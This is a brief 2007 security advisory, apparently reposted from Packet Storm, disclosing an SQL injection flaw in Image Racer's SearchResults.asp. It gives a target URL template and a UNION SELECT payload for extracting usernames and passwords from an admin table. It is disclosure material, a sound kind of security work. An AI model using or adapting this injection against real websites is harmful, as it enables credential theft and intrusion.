imageracer-sql.txt

🗓️ 24 Jul 2007 00:00:00Reported by aria-security.netType

packetstorm🔗 packetstormsecurity.com👁 17 Views

Image Racer SearchResults.asp SQL Injection on http://www.junctionquest.com/Software.asp. Example: -1 'union select username, password from admin where [FIND IT YOUR SELF]=1. Credits to Aria-Security Team

`__________________  
  
Aria-Security Team  
__________________  
  
Image Racer SearchResults.asp SQL Injection  
Vendor: http://www.junctionquest.com/Software.asp  
  
Example:  
http://www.TARGET.com/SearchResults.asp?SearchWord=[SQL COMMAND]&WordSearchCrit=Yes&image.x=0&image.y=0  
  
Example :  
-1 'union select username,password from admin where [FIND IT YOUR SELF]=1  
  
------------------------------------------------  
Credits: Aria-Security Team   
http://aria-security.net/  
Personal Blog: http://outlaw.aria-security.info  
`

24 Jul 2007 00:00Current

7.4High risk

Vulners AI Score7.4